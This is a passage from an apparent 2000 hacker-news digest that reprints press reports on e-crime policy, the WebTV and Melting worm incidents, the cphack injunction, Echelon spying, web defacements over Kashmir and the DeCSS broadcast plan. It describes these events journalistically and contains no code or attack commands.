Committee to evaluate Australasia's capacity to fight electronic crime.

It will develop an Australasian Law Enforcement Electronic Crime Strategy
by the end of June.



@HWA


43.0 HNN:Mar 17th:Apex DVD Defeats Region and Macrovision
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Sciri
Hot on the trail of the PlayStation2 being able to play
Region 1 discs is the Apex AD-600A, a DVD/VCD/CD/MP3
player that can disable CSS, Region and Macrovision
settings after entering a simple code (Preferences ->
Step -> Prev Track -> Next Track).

Review of the Apex-600A
http://uberauk.epinions.com/elec-review-10C9-40ABFE-388DCD5F-bd3

Nerd Out
http://www.nerd-out.com/

@HWA



44.0 HNN:Mar 20th:First Malicious Code Direct at WebTV
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Hal0
Microsoft is working on a patch of its service to
counteract malicious programming code that overloads
WebTV newsgroup discussions with fake postings. While
the malicious code self replicates like a virus Microsoft
insists on calling it malicious code. The code appends
itself to a WebTV users signature file and then cross
posts itself to numerous newsgroups.

Wired
http://www.wired.com/news/technology/0,1282,35045,00.html

WebTV's 'Non-Virus' Virus
by Chris Oakes

3:00 a.m. Mar. 18, 2000 PST

Although it prefers to call the trouble a "malicious code," WebTV has
experienced its first virus. Parent company Microsoft is working on
a patch of its service to counteract malicious programming code that
overloads WebTV newsgroup discussions with fake postings.

"Newsgroups are starting to flood with junk posts, and you can't post,"
said Brian Bock, editor-in-chief of Net4TV Voice, an online publication
focusing on Internet services via television. WebTV users first reported
the problem to Net4TV.

Bock said the virus -- a first for the closed, non-PC WebTV system -- is
like the renowned PC virus Melissa. The similarity is that it
self-replicates, he said. But this virus does it by altering signatures
that appear at the bottom of WebTV user's Usenet messages.

"When another WebTV user runs across [an infected message], it writes the
virus into their email signature," he said. "Then when they go make a
Usenet posting, it cross-posts. They end up posting to a whole bunch of
different news groups."

The result is the multiplication of junk messages in discussion forums
until discussions are disrupted completely because the system's maximum
number of viewable messages is reached.

Microsoft was extremely reluctant to call the problem a virus. "It's not a
virus," said Microsoft spokeswoman Claire Haggard. "There's never been a
virus on WebTV."

Then what is it?

Haggard said the problem was malicious code in WebTV's Usenet posting
system.

The company took issue with the description of the code as
"self-replicating," saying it had to be "manually" inserted in Usenet
posts and didn't self-replicate. Furthermore, Haggard said the multiplying
Usenet messages did not involve the exploitation of a user's signature.

Bock said the virus does make use of an existing flaw in the service's
email system. That hole is exploited along with a WebTV code for posting
messages, Bock said.

The issues are separate, Haggard said.

In any case, the problem gets awfully close to meeting the conventional
definition of virus: a malicious code that, once installed, performs
usually undesirable tasks on the victim's computer.

In most technical definitions, self-replication is not a prerequisite,
although the Merriam-Webster definition of virus does include
self-replication: "A computer program usually hidden within another
seemingly innocuous program that produces copies of itself."

Virus or not, manual or self-replicating, the malicious code will be
patched, hopefully by next week, the company said. Meanwhile, WebTV will
be removing the junk posts. Haggard said the company has only heard from
14 users inquiring about the problem.

She said the company plans a regular update of its client and server
software soon, and that "the upgrade will be made immune from such hacker
problems."


@HWA


45.0 HNN:Mar 20th:Liberia Claims Attack In CyberWar
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
President Charles Taylor of Liberia has claimed that his
country is under attack in a cyber war but failed to say
by whom. He made the statement after his government
shut down two independent radio stations and their
related web sites. Amnesty International and the US
State Department have vigorously protested the station
closings.

Wired
http://www.wired.com/news/politics/0,1283,35016,00.html

'Cyber War' in Liberia
Reuters

7:00 a.m. Mar. 17, 2000 PST

MONROVIA -- President Charles Taylor of Liberia, reacting to criticism of
the government's closure of two radio stations, said a "cyber war" had
been declared on his country.

"A cyber war has been declared on Liberia and the government is doing
everything possible to fight back," he said on Thursday at his Executive
Mansion after signing into law seven bills.


He did not say who was waging this war.

Star, an independent radio station that was closed down on Wednesday, had
an Internet news service popular with Liberians abroad that was also
closed.

The government justified the closures by saying that "agents provocateurs"
were using the news media, especially radio stations, to create security
problems.

"The government took the action to prevent an outbreak of another war
which could be caused by negative broadcasts to create hatred among the
Liberian people through hate messages," Taylor said.

Taylor's election in 1997 formally ended a civil war that he started in
December 1989.

The U.S. government joined human rights groups, local media, and the Press
Union of Liberia in protesting against the closures.

"The United States vigorously protests the unwarranted closure of these
two radio stations and calls on the Government of Liberia to reopen them
immediately, without conditions, and to return the confiscated equipment,"
the U.S. State Department said in a statement.

Rights group Amnesty International has linked the closure of Star to a
March 13 broadcast it made about a U.S. State Department report on human
rights in Liberia.

Star was established in 1997 by the Hirondelle Foundation, a Swiss-based
non-governmental organization, with the help of the United States Agency
for International Development.

The second station, Radio Veritas, is run by the Roman Catholic Church.
The government suspended the station but said it could start operating
again if it provided a written assurance it would broadcast only religious
material.

The Catholic Archbishop of Monrovia said Veritas had a constitutional
right to broadcast.

"It is our constitutional right to disseminate information to the public
and if we abuse the right, let the courts deal with us, not the
executive," Archbishop Michael Kpakala Francis said in a statement
released late on Thursday.

"We will not give any commitment to the government of Liberia that will
restrict us to religious programs," he added, denying that Veritas'
license restricted it to religious broadcasts.


@HWA


46.0 HNN:Mar 20th:Judge Bans Anti-Filter Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Aj
U.S. District Judge Edward F. Harrington has granted an
injunction requested by Microsystems Software Inc. to
prevent distribution of cphack. Cphack was designed to
bypass the surfing restrictions used by CyberPatrol as
well as list every web site blocked by the software. The
Judges decision effectively blocks anyone from
distributing the software. There were no defendants
present at the hearing, the next hearing is scheduled for
March 27th. (This could be a rather serious threat to
peoples' right to reverse engineer and to even write
software.)

MSNBC
http://www.msnbc.com/news/383603.asp

Associated Press - via Washington Post
http://www.washingtonpost.com/wp-srv/aponline/20000317/aponline133352_000.htm

Porn Software Injunction Issued

By Martin Finucane
Associated Press Writer
Friday, March 17, 2000; 1:33 p.m. EST

BOSTON –– A federal judge Friday ordered a halt to the distribution of
a computer program that allows children to bypass software designed to
keep them away from Internet pornography.

Microsystems Software Inc. of Framingham, which sells the widely used
"Cyber Patrol" filtering software, sued two computer experts who
distributed the bypassing software via the Internet. The software, called
"cphack," also discloses a list of sites that are blocked by the Cyber Patrol
program.

U.S. District Judge Edward F. Harrington ordered Matthew Skala, a
self-described cryptography buff who attends the University of Victoria in
British Columbia, and Eddy L.O. Jansson, believed to be living in
Sweden, to stop spreading the "cphack" program.

The judge also blocked distribution of the "cphack" software by anyone
working with them.

Microsystems attorney Irwin Schwartz said the judge's order extended to
any "mirror" Web sites, where the program may have been copied and
made available. Another hearing is set for March 27 on the case.

Skala and Jansson were not represented at Friday's hearing, and they did
not immediately return e-mails seeking comment.

Microsystems has said in its legal filings it would suffer "irreparable harm"
from the publication of the bypassing software, which it said sought to
destroy the market for its product by rendering it ineffective.

"The practical effect is that ... children may bypass their parents' efforts to
screen out inappropriate materials on the Internet," according to the filing
made this week.

Free speech advocates criticized the company's move to block
distribution of the software.

Peter Junger, a law professor at Case Western Reserve University in
Cleveland and an advocate of free speech on the Internet, said it "looks
like a rather horrifying challenge to people's right to write software" and to
"reverse-engineer" software, which means figure out how it works.

"The idea that one can prevent reverse-engineering of software and
publishing the results of that reverse-engineering strikes me as a very
dangerous restriction on free speech," he said before the judge's ruling.

Chris Hansen, a senior lawyer with the national office of the American
Civil Liberties Union, said there might be debate about whether
distributing the bypass software was legal, but that the ACLU agreed with
at least one role of the software – publicizing the list of blocked sites.

"Parents who want to install these products ought to be able to do so," he
said, adding, "How can you, as a parent, make an intelligent decision (on
filtering software)if the product won't tell you what they're blocking?"

© Copyright 2000 The Associated Press



@HWA


47.0 HNN:Mar 20th:We Spy To Prevent Bribes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Weld Pond
A former Director of Central Intelligence, R. James
Woolsey, has written a story about why the United
States spies on its allies. The primary reason given is to
prevent bribery so that US companies can compete on
an even playing field. (Sorry but I don't buy it, that is
too much power for such a simple purpose but I guess
the ends justify the means for the US Government. So
why can't US citizens spy on their own government to
make sure they are complying with the law? Where are
the checks and balances?)

Wall Street Journal - via Cryptome
http://cryptome.org/echelon-cia2.htm

17 March 2000. Thanks to DB.

We look forward to seeing and hearing James Woolsey and Duncan Campbell
openly debate this controversy, in Congressional hearings, on global TV,
the Internet, MilNet and IntelNet -- and all the Echelon surveillance
stations based in countries of those who "can't compete with the US."

See transcript of Woolsey's March 7 remarks on economic espionage to the
Foreign Press Center: http://cryptome.org/echelon-cia.htm



The Wall Street Journal, March 17, 2000

Why We Spy on Our Allies

By R. James Woolsey, a Washington lawyer and a former Director of Central
Intelligence.

What is the recent flap regarding Echelon and U.S. spying on European
industries all about? We'll begin with some candor from the American side.
Yes, my continental European friends, we have spied on you. And it's true
that we use computers to sort through data by using keywords. Have
you stopped to ask yourselves what we're looking for?

The European Parliament's recent report on Echelon, written by British
journalist Duncan Campbell, has sparked angry accusations from continental
Europe that U.S. intelligence is stealing advanced technology from
European companies so that we can -- get this -- give it to American
companies and help them compete. My European friends, get real. True, in a
handful of areas European technology surpasses American, but, to say this
as gently as I can, the number of such areas is very, very, very small.
Most European technology just isn't worth our stealing.

Why, then, have we spied on you? The answer is quite apparent from the
Campbell report -- in the discussion of the only two cases in which
European companies have allegedly been targets of American secret
intelligence collection. Of Thomson-CSF, the report says: "The
company was alleged to have bribed members of the Brazilian government
selection panel." Of Airbus, it says that we found that "Airbus agents
were offering bribes to a Saudi official." These facts are inevitably left
out of European press reports.

That's right, my continental friends, we have spied on you because you
bribe. Your companies' products are often more costly, less technically
advanced or both, than your American competitors'. As a result you bribe a
lot. So complicit are your governments that in several European
countries bribes still are tax-deductible.

When we have caught you at it, you might be interested, we haven't said a
word to the U.S. companies in the competition. Instead we go to the
government you're bribing and tell its officials that we don't take kindly
to such corruption. They often respond by giving the most
meritorious bid (sometimes American, sometimes not) all or part of the
contract. This upsets you, and sometimes creates recriminations between
your bribers and the other country's bribees, and this occasionally
becomes a public scandal. We love it.

Why do you bribe? It's not because your companies are inherently more
corrupt. Nor is it because you are inherently less talented at technology.
It is because your economic patron saint is still Jean Baptiste Colbert,
whereas ours is Adam Smith. In spite of a few recent reforms, your
governments largely still dominate your economies, so you have much
greater difficulty than we in innovating, encouraging labor mobility,
reducing costs, attracting capital to fast-moving young businesses and
adapting quickly to changing economic circumstances. You'd rather not go
through the hassle of moving toward less dirigisme. It's so much easier to
keep paying bribes.

The Central Intelligence Agency collects other economic intelligence, but
the vast majority of it is not stolen secrets. The Aspin-Brown Commission
four years ago found that about 95% of U.S. economic intelligence comes
from open sources.

The Campbell report describes a sinister-sounding U.S. meeting in
Washington where -- shudder! -- CIA personnel are present and the
participants -- brace yourself -- "identify major contracts open for bid"
in Indonesia. Mr. Campbell, I suppose, imagines something like this:
A crafty CIA spy steals stealthily out of a safe house, changes disguises,
checks to make sure he's not under surveillance, coordinates with a spy
satellite and . . . buys an Indonesian newspaper. If you Europeans really
think we go to such absurd lengths to obtain publicly available
information, why don't you just laugh at us instead of getting in high
dudgeon?

What are the economic secrets, in addition to bribery attempts, that we
have conducted espionage to obtain? One example is some companies' efforts
to conceal the transfer of dual-use technology. We follow sales of
supercomputers and certain chemicals

  
closely, because they can be
used not only for commercial purposes but for the production of weapons of
mass destruction. Another is economic activity in countries subject to
sanctions -- Serbian banking, Iraqi oil smuggling.

But do we collect or even sort secret intelligence for the benefit of
specific American companies? Even Mr. Campbell admits that we don't,
although he can't bring himself to say so except with a double negative:
"In general this is not incorrect." The Aspin-Brown Commission was
more explicit: "U.S. Intelligence Agencies are not tasked to engage in
'industrial espionage' -- i.e. obtaining trade secrets for the benefit of
a U.S. company or companies."

The French government is forming a commission to look into all this. I
hope the commissioners come to Washington. We should organize two seminars
for them. One would cover our Foreign Corrupt Practices Act, and how we
use it, quite effectively, to discourage U.S. companies from bribing
foreign governments. A second would cover why Adam Smith is a better guide
than Colbert for 21st-century economies. Then we could move on to
industrial espionage, and our visitors could explain, if they can keep
straight faces, that they don't engage in it. Will the next commission
pursue the issue of rude American maitre d's?

Get serious, Europeans. Stop blaming us and reform your own statist
economic policies. Then your companies can become more efficient and
innovative, and they won't need to resort to bribery to compete.

And then we won't need to spy on you.



@HWA


48.0 HNN:Mar 20th:LAPD Tells Parody Site To Chill
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Rho
The Computer Crimes Division of the L.A. County
Sheriff's Department has forced
www.fortheloveofjulie.com to alter its content. Fearing
that the fake stalking site was a little too real and that
it could hamper probes of real crimes they strongly
suggested that the owner make changes to the site or
take it down. The site is meant to be entertaining and
spooky similar to 'The Blair Witch Project'.

CNN
http://www.cnn.com/2000/TECH/computing/03/17/julie.folo/index.html

Authorities tell faux-stalker
site to tone it down

March 17, 2000
Web posted at: 8:46 p.m. EST (0146 GMT)

By D. Ian Hopper
CNN Interactive Technology Editor

(CNN) -- After getting over 2 million
page views, the authors of a
faux-stalker site got a call from
someone who wasn't such a fan -- a
police detective.

A detective from the Computer
Crimes Division of the L.A. County Sheriff's Department contacted Spark
Factory president Tim Street Friday. According to authorities, the detective
strongly suggested that Street take down FortheloveofJulie.com, a fake
stalker site that aims to be an entertaining but spooky story in the tradition of
last year's "The Blair Witch Project" phenomenon.

The site is a shrine to "Julie" from her admirer, a video-store clerk who
follows her home and to her work, taking videos and posting a journal
complete with movie clips and pictures.

The site has become very popular, Street says,
through both word-of-mouth and media
attention. While it's completely fake, many users
failed to see a disclaimer because they're going
through a publicized back door that bypasses
SpookySites.com, where it's indexed.

SpookySites contains a small disclaimer upon entering the site that informs
users that the content within "may contain fictionalization."

But like many others, the detective entered the site through a back door,
missing the disclaimer. When he called Street, the site's author was skeptical.

"He told me he was with the police department. I wanted to call him back to
make sure, because practical jokes around here are running rampant," Street
said. "One guy here said he was from the FBI."

"We received a tip from an investigator on the East Coast," says Sgt. Larry
Balich.

Authorities found a photo in the site that clearly showed a vehicle and license
plate, and traced it back to Street.

"We thought we had a stalking situation on our hands," Balich says. "But we
needed a victim. You can't investigate a case without a victim or witness,
and we had neither."

After contacting the district attorney's
office, detectives found that no crime
had been committed. Still, Street says,
police "strongly suggested" that he
take the site down or close the back
door and make the disclaimer more
obvious.

"We're going to frame it inside
CreepySites," Street said. "We'll have
a bolder disclaimer that says
FortheloveofJulie is fictitious, and Julie
is not in any danger."

"We don't think we have to," he says, "but we don't want to have any
problems."

Balich says the site was just a little too real and could hamper probes of real
crimes.

"It's troublesome to have something like this on the Internet," Balich says. "I
consider it a misuse of a real positive thing."

The site was taken down for most of the day but came back up in the
afternoon with the intended changes.

Street says he made the site as an "Internet soap opera" meant to entertain
users who were in for a suspenseful thrill.

"It's not our intent to be evil, creepy people," he says. "We're trying to
showcase how this new experience can change entertainment on the
Internet."

Street says he has already left a message with the FBI to try to head off any
more misunderstandings.


@HWA


49.0 HNN:Mar 20th:New Windows Worm Virus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne
A new worm virus that can shut down MS Windows
platforms and make the operating system permanently
unusable has been discovered by Computer Associates
International. Once launched via MS Outlook under
Windows 95, 98, 2000 or NT, Win32/Melting.Worm saves
itself into a Windows directory under the name
MeltingScreen.exe. It renames .exe files into .bin files.

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,15777,00.html


Windows ‘Worm’ Virus
Slithers

Computer Associates identifies virus that travels
through Outlook.

by Kathleen Ohlson, Computerworld
March 17, 2000, 6:56 a.m. PT

A new worm now "in the wild" has the potential to shut
down Windows platforms and make the operating
system permanently unusable.

Computer Associates International discovered the
worm, Win32/Melting.worm, on Tuesday, when
customers started to find it in their e-mail systems,
says Narender Mangalam, director of security solutions
at CA. So far, it has hit some Fortune 1000 software
companies, he says.

"The risk level is moderate, and it hasn't caused too
much damage because we believe we've caught it in
time," Mangalam says. CA markets InoculateIT, a virus
detection and prevention program.

The Melting Worm is unleashed through Microsoft's
Outlook running on Windows 95, 98, 2000, or NT,
according to CA representatives. Once launched, the
worm puts a copy of itself into a Windows directory as
MeltingScreen.exe and remains in memory. Files with
.exe extensions in a system's Windows directory are
renamed with .bin extensions.

As the worm renames files, including ones critical to
operating Windows, these changes may render the
operating system useless.

The worm also starts to e-mail itself to all the names in
a victim's Outlook address book and randomly
executes other .exe files, Mangalam says. This
potentially can take down a company's e-mail system.


@HWA


50.0 HNN:Mar 20th:GNIT Now Freeware
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by m0nk
Ellicit Organization has released a freeware version of
their latest program, GNIT NT Vulnerability Scanner. The
scanner checks for over a dozen NT vulnerabilities.

Ellicit.org
http://security.ellicit.org/


@HWA


51.0 HNN:Mar 20th:Online Criminals Labeled Boffins
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by dogcow
The Australian Federal Police Commissioner, Mick Palmer,
was recently quoted as saying that while much of online
crime is currently "in the early stages it is being done by
people who simply are boffins and are doing it by way of
exploration rather than criminal intent." (Glad to see
that Australia is on top of Internet crime.)

Sydney Morning Herald
http://www.smh.com.au/news/0003/18/national/national6.html




NATIONAL




'Police must get ahead of e-crime'

By JANINE ISRAEL

Undetected organised electronic-crime could undermine the nation's security
and financial stability, the Australian Federal Police Commissioner, Mr
Mick Palmer, warned yesterday.

He told a conference of Australasian and south-west Pacific police
commissioners in Canberra that a co-ordinated international response was
required urgently to crack down on electronic terrorism, child pornography,
racism, fraud and money laundering.

Mr Palmer said the Internet meant crimes were being committed in countries
where perpetrators had "never set foot" and international legislation and
treaties must be set up to prosecute criminals irrespective of national
borders.

Australia, New Zealand, Fiji and Papua New Guinea police commissioners
announced they would establish an Australasian Law Enforcement Electronic
Crime Strategy to address the issue.

Mr Palmer said the Australian police force lacked electronic expertise, and
were looking to recruit computer boffins to tackle electronic crime.

"We need to be buying those skills from the cutting edge of the
technological workplace. We need to form close partnerships with the
private sector and wider government agencies," he said.

But employing people with the skills to fight electronic crime was costly.
Retention was a problem in a competitive market where those with
technological skills were lured by high salaries to the private sector.

The international nature of cyberspace made it almost impossible to
identify perpetrators let alone snare electronic criminals. Credit card
fraud already was costing the credit card industry billions, Mr Palmer
said.

He said growing forms of e-crime included such things as money laundering
and tax evasion. Cyber-stalking, illegal interceptions or "electronic
eavesdropping" were a concern, as were political and industrial espionage.
Fraudulent sales pitches along with bogus charitable or investment
solicitations were increasingly common.

These were not necessarily "new crimes", Mr Palmer said, just "new methods
to commit traditional crimes".

"One of the difficulties with electronic crime is that not only is it very
intrusive and superficially invisible, but many crimes can be committed
without the victim knowing it has been committed," he said.

While e-crime is still in its "embryo state", authorities predict it will
expand with the electronic market to become more organised and
sophisticated. "Much of it in the early stages is being done by people who
simply are boffins and are doing it by way of exploration rather than
criminal intent. The damage caused by those activities is of course equally
serious," he said.

He said police were "alarmed" by the capability of people to commit
offences on a global basis, with complete anonymity, with speed and on a
large scale. A staggering 900 million people were expected to be using
the Internet by the end of the year.


@HWA

52.0 HNN:Mar 21st: Conflict In Kashmir Continues Online
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by McIntyre
Over 600 web sites in India including government
systems have been defaced in recent months by people
in Pakistan. The conflict in Kashmir is seen as one of the
primary reasons for the defacements.

CNN
http://www.cnn.com/2000/TECH/computing/03/20/pakistani.hackers/index.html

Kashmir conflict continues to
escalate -- online

By D. Ian Hopper
CNN Interactive Technology Editor

March 20, 2000
Web posted at: 8:15 p.m. EST (0115 GMT)

(CNN) -- A group of Pakistani
hackers has used the conflict in
Kashmir as a reason to deface almost
600 Web sites in India and take
control of several Indian government
and private computer systems, according to the group.

A computer security Web site -- attrition.org -- has records of the
defacements claimed by the Muslim Online Syndicate.

The M0S, which a member says consists of mostly Pakistani Muslims, is
made up of self-proclaimed "hacktivists," those who commit computer
crimes -- ranging from simple defacement to full-scale intrusions to denial of
service attacks -- in order to bring attention to a social cause.

The group has nine active members, according to a representative who
spoke on behalf of the group on condition of anonymity. They range from 16
to 24 years old, the representative said. Several of them are students or
computer professionals, and one is a medical student, the representative
added.

Unlike the majority of Web vandals, the MOS
members say they secretly take control of a
server, then deface the site only when they
"have no more use" for the data or the server
itself.

"The servers we control range from harmless mail and Web services to
'heavy duty' government servers," says the MOS representative. "The data is
only being categorically archived for later use if deemed necessary."

The group says it's not interested in e-commerce sites or credit card
information.

Most of the group's defacements came in one fell swoop, when they broke
into India's largest Internet service provider, IndiaLinks. While there, they
defaced more than 500 sites hosted by the company, including many travel
and company sites, IndiaLinks confirms.

IndiaLinks, based in Bombay, hosts more than
6,000 Web sites, according to CEO Bhavin
Chandarana.

Chandarana says the group had access to
servers co-hosted by Alabanza, an American
ISP. He says the group had access for about an
hour.

The MOS won't be facing any legal problems
stemming from its exploits, Chandarana says,
because IndiaLinks was not able to get the server logs from Alabanza.
Chandarana says his company is in the process of removing their business
from the U.S. ISP.

Representatives for Alabanza did not respond to several e-mails and two
phone messages requesting comment.

One of the Web sites defaced was that of the Indian Science Congress
2000. The ISC's local organizing secretary, Bhushan Patwardhan, told The
Hindu newspaper that the defacement was removed as soon as it was
detected.

The MOS has a Web site mirroring its attacks that contains a well-known
expletive. Expletives in domain names used to be taboo, but with the
deregulation of domain registration, it is no longer forbidden.

"We hope to bring the Kashmir conflict to the world's attention," MOS says.
"We wish to see the day when our Muslim brethren will be given the right to
choose, as was promised them half a century ago."

India and Pakistan have fought two wars over the last half-century over rival
claims for the Himalayan territory of Kashmir. They clashed again last
summer when Pakistan-based fighters seized mountain peaks inside India.

Hundreds of militants died before India and Pakistan -- under international
and domestic pressure -- withdrew their forces.

Ignoring world pressure, India and Pakistan both tested nuclear devices in
1998, dramatically escalating tensions.

The stated goal of the MOS -- social action through hacking -- is becoming
a more popular one. Hacktivists attacked the World Trade Organization
Web site during their Seattle conference last year, and a mailing list helps
concerned activists discuss strategy, targets and coordinate attacks. Rather
than simply defacing sites, denial of service attacks have become the
weapon of choice.

Alex Fowler, Strategic Initiatives Director for the Electronic Frontier
Foundation, predicted this escalation in October 1999 in an interview with
CNN Interactive.

"We will see very serious attacks. Information stealing could have very
long-term consequences for consumers," Fowler said.



@HWA


53.0 HNN:Mar 21st:Army Weapon Systems At Risk of Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
Army Maj. Sheryl French has said that the possibility
exists for intruders to infiltrate the computer systems
used in tanks and other armored vehicles. Modern tanks
and ships make extensive use of computers, software
and data communications links for functions such as
navigation, targeting and command and control. DISA
has already tested the possibility of inputting false
navigation data into a ships computer from an
unauthorized land based laptop.

Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0320/web-hacker-03-21-00.asp

Hacker-controlled tanks, planes and warships?

BY Dan Verton 03/21/2000

Army officials are worried that sophisticated hackers and other
cybercriminals, including military adversaries, may soon have the
ability to hack their way into and take control of major military weapon
systems such as tanks and ships.

Speaking this month at the annual Army Directors of Information Management
Conference in Houston, Army Maj. Sheryl French, a program manager
responsible for the Army’s Information Assurance Architecture for the
Digitized Force, said the potential exists for hackers to infiltrate the
computer systems used in tanks and other armored vehicles. Unlike in the
past, today’s modern tanks and ships are almost entirely dependent on
computers, software and data communications links for functions such as
navigation, targeting and command and control.

Although the Pentagon has always had computer security issues to deal
with, "we’ve never had computers" in tanks and armored personnel
carriers before, said French, pointing to a picture of an M-1 Abrams Main
Battle Tank.

In fact, the Defense Department has already tested and proven that hackers
have the ability to infiltrate the command and control systems of
major weapons, including Navy warships. According to a training CD-ROM on
information assurance, published by the Defense Information Systems
Agency, an Air Force officer sitting in a hotel room in Boston used a
laptop computer to hack into a Navy ship at sea and implant false
navigation data into the ship’s steering system.

"Yes, this actually happened," the CD-ROM instructs military personnel
taking the course. "Fortunately, this was only a controlled test to
see what could be done. In reality, the type of crime and its objective is
limited only by people’s imagination and ability."

John Pike, a defense and intelligence analyst with the Federation of
American Scientists, said that although there are well-known
security gaps in the commercial systems that the Army plans to use on the
battlefield, hacking into tanks and other weapons may prove to be too
difficult for an enemy engaged in battle.

"The problem for the enemy is that computer security vulnerabilities will
almost certainly prove fleeting and unpredictable," said Pike,
adding that such tactics would be nearly impossible to employ beyond the
random harassment level.

@HWA


54.0 HNN:Mar 21st:2600 AU to Broadcast DeCSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by hool
In yet another twist in the MPAA vs. DeCSS case 2600
of Australia plan to broadcast the source code of DeCSS
on national TV. Australian Federal copyright laws can
not currently prevent this broadcast. The information
will be displayed at 12 frames per second, it is
recommended that viewers tape record the information
and review it later frame by frame. The code is
expected to air sometime in the next few weeks
between 3 and 4 am.

Computerworld AU
http://www.computerworld.idg.com.au/CWT1997.nsf/cwtoday/DB6C6D9B3448ECE64A2568A00075454B?OpenDocument


2600 AU
http://www.2600.org.au


ComputerWorld;

Hackers with heart

By Byron Kaye
13 March, 2000

SYDNEY - Loopholes in Federal laws mean
hacker advocate group 2600 Australia will be able
to broadcast DVD decryption codes and other
sensitive information on national television within
weeks.


Grant Bayley, who heads up 2600 Australia, the
international organisation's Australian operation,
said it was currently devising a 15-second
broadcast, which he said would contain text files,
delivered at 12 frames per second, and suggestions
pertaining to the "ethics" of datacasting, computer
security and privacy, and access-controlling DVD
encryption.

Bayley said the text contained in the broadcast
would not be comprehensible as it appeared live on
television, but he suggested viewers record the
broadcast on video and then watch the information
afterwards "frame by frame".

Bayley said the broadcast would be "fed" to
Channel 10 by MindShare, a company that
supplies advertising material in bulk for the
television station. MindShare's own advertising
slogan is "Head space invaders". The broadcast
time was not yet known, but Bayley said it was
expected to screen between 3:00 and 4:00 am
"some time in the next few weeks".

Bayley maintained information contained in the
broadcast would "primarily encourage ethical",
educational use of new technologies such as
datacasting. However, he admitted some
information -- pertaining to the decryption of DVD
access codes -- which could not be legally
broadcast in the US, would be screened.

Australian Federal copyright laws, even those
currently being amended, were unable to prevent
broadcasting of information such as DVD
decryption codes, regardless of how commercially
crippling the information might potentially be, he
said.

Bayley said he was convinced that he knew the
15-year-old hacker who penetrated the ASX
website two weeks ago "pretty well". The ASX
hack caused an outage of four hours, leaving the
site littered with banner messages reading
"Prosthetic owns the ASX". Bayley maintained
2600 did not support or encourage vandalistic
hack attacks such as this. "Stupid people do stupid
things," he said.

The title "2600" refers to the frequency of pitch that
technology-savvy Americans played into their
telephone receivers to thwart long distance call
charges in the early 1980s.



@HWA


55.0 HNN:Mar 21st:CIA Monitoring Upheld by Court
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The CIA's Foreign Bureau of Information Services policy
allowing agency officials to monitor employees' Internet
use has been upheld by federal appeals court. The
policy included provisions to review employees' e-mail
messages and to collect information on their Web site
visits. The policy had helped convict a federal employee
of downloading child pornography on government time.

Government Executive Magazine
http://www.govexec.com/dailyfed/0300/032000m1.htm

March 20, 2000

DAILY BRIEFING

Court upholds agency reviews of
employees' Internet use

By Kellie Lunney
klunney@govexec.com

A federal appeals court has upheld a CIA policy allowing
agency officials to monitor employees' Internet use. The policy
had helped convict a federal employee of downloading child
pornography on government time.

The CIA's Foreign Broadcast Information Service
implemented a policy in June 1998 authorizing "electronic
audits" of employee computers in order to crack down on
non-business related Internet use. Those audits included
reviewing employees' e-mail messages and collecting
information on their Web site visits.

Later that summer, Science Applications International Corp.
(SAIC), which had a contract to manage FBIS' computer
network and monitor inappropriate Internet behavior, alerted
the agency when the keyword "sex" turned up numerous hits in
a firewall database during a routine test. The hits originated
from the computer of Mark L. Simons, an electronic engineer
at FBIS.

FBIS officials then searched Simons' computer and office on
four occasions, eventually compiling enough evidence to indict
him on two counts of knowingly receiving and possessing child
pornography downloaded from the Internet and stored on his
government hard drive.

Simons claimed that his Fourth Amendment rights had been
violated during the searches. But a district court upheld the
searches. Simons was found guilty and was sentenced to 18
months in jail.

The U.S. Court of Appeals for the Fourth Circuit affirmed that
decision in late February, saying that Simons failed to prove
that he had a "legitimate expectation of privacy in the place
searched or the item seized."

According to the appeals court, "In the final analysis, this case
involves an employee's supervisor entering the employee's
government office and retrieving a piece of government
equipment in which the employee had absolutely no
expectation of privacy [due to the agency's Internet
policy]—equipment that the employer knew contained
evidence of crimes committed by the employee in the
employee's office ... Here, there was a conjunction of the
conduct that violated the employer's policy and the conduct
that violated the criminal law."

The court's decision in USA v. Simons (99-4238) is online at
www.law.emory.edu/4circuit/feb2000/994238.p.html.


@HWA


56.0 HNN:Mar 21st:Make Your Reservations for RootFest Now!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by rootfest
RootFest is back for its second try. RootFest 2000 will
be June 14-16, 2000, and will be held at the brand-new
St. Paul RiverCentre facility just 15 minutes from the
Mall of America. Three days of speakers, events,
contests and more is planned, making this a can't-miss
event.

RootFest
http://www.rootfest.org/


@HWA



57.0 HNN:Mar 22nd:Cybercrime On The Rise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Evil Wench
The Computer Security Institute and the San Francisco
FBI Computer Intrusion Squad jointly released a report
